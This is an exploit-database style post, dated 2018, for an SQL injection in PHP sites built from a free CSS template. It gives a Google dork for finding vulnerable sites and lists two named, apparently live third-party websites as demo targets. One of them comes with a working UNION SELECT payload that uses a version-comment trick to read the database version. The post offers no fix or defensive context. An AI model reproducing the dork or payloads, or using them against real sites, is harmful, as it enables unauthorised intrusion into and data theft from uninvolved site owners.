# Exploit Title : Design by FCT SQL Injection Vulnerability
# Date : 2018-06-27
# Exploit Author : Iran Cyber Security Group
# Vendor Homepage : www.freecsstemplates.org
# Google Dork : "Design by FCT" inurl:.php?id=
# category : webapps
# Tested on : Win7 , Kali Linux
Proof of Concept :
search google Dork : "Design by FCT" inurl:.php?id=
Demo :
http://www.kyrgyzstan-sj.org/eng/news.php?news=103' [Sql injection Vulnerability]
http://www.northcotechiropractic.com/shop_detail.php?id=6' [Sql injection Vulnerability]
http://www.kyrgyzstan-sj.org/eng/news.php?news=-103%27+/*!50000union*/+select+1,2,version(),4,5,6,7--+
# Discovered by : Mr_null